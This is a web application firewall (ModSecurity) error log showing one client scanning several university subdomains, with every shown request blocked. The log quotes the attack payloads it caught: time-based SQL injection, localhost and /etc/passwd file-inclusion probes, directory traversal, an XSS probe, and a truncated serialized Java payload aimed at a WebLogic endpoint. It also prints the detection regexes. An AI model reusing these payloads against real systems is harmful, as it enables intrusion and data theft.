[Tue Aug 29 11:35:13.340893 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAUJIz8AAABB"]
[Tue Aug 29 11:35:13.360471 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAATUxS0AAAAW"]
[Tue Aug 29 11:35:13.368391 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAATWYTMAAAAa"]
[Tue Aug 29 11:35:13.374844 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gcCo-f0AAATQXjIAAAAO"]
[Tue Aug 29 11:35:13.396497 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gcCo-f0AAAShCbUAAAAi"]
[Tue Aug 29 11:35:14.305274 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAULx9wAAABD"]
[Tue Aug 29 11:35:14.328777 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAPLwLMAAAAX"]
[Tue Aug 29 11:35:14.333680 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAAUbg2IAAABQ"]
[Tue Aug 29 11:35:14.334175 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAATWYTUAAAAa"]
[Tue Aug 29 11:35:14.355402 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAATUxTIAAAAW"]
[Tue Aug 29 11:35:14.358103 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAUbg2MAAABQ"]
[Tue Aug 29 11:35:14.361103 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVJXl4AAAAA"]
[Tue Aug 29 11:35:14.365516 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAULx98AAABD"]
[Tue Aug 29 11:35:14.380239 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/etc/passwd found within TX:1: 0177.0.0.1/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11gsCo-f0AAAVJXl8AAAAA"]
[Tue Aug 29 11:35:14.381429 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11gsCo-f0AAARdiUUAAAAK"]
[Tue Aug 29 11:35:15.521518 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO11g8Co-f0AAAShCboAAAAi"]
[Tue Aug 29 11:35:15.606235 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11g8Co-f0AAAVvlGUAAAAe"]
[Tue Aug 29 11:35:15.763572 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "informatika.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11g8Co-f0AAAUQ7uAAAABH"]
[Tue Aug 29 11:35:16.189186 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAATQXjgAAAAO"]
[Tue Aug 29 11:35:16.207324 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUDQUkAAAA7"]
[Tue Aug 29 11:35:16.214299 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "ft.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASHh@oAAAAD"]
[Tue Aug 29 11:35:16.271485 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "journal.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAAUOaWAAAABG"]
[Tue Aug 29 11:35:16.343971 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAVJXmIAAAAA"]
[Tue Aug 29 11:35:16.344152 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAVWQAwAAAAV"]
[Tue Aug 29 11:35:16.345592 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUQ7uEAAABH"]
[Tue Aug 29 11:35:16.350544 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAASI0FoAAAAG"]
[Tue Aug 29 11:35:16.362540 2023] [:error] [pid 1388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11hMCo-f0AAAVsUboAAAAb"]
[Tue Aug 29 11:35:16.362635 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASEJZcAAAAE"]
[Tue Aug 29 11:35:16.382317 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAATzVKQAAAAx"]
[Tue Aug 29 11:35:16.385438 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAUXLkwAAABM"]
[Tue Aug 29 11:35:16.386346 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventDatayv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9Jbn..."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11hMCo-f0AAASI0FsAAAAG"]
[Tue Aug 29 11:35:16.393672 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cfg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:cfg: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZO11hMCo-f0AAAULx@MAAABD"]
[Tue Aug 29 11:35:16.395010 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/passport/index.php"] [unique_id "ZO11hMCo-f0AAAPLwLgAAAAX"]
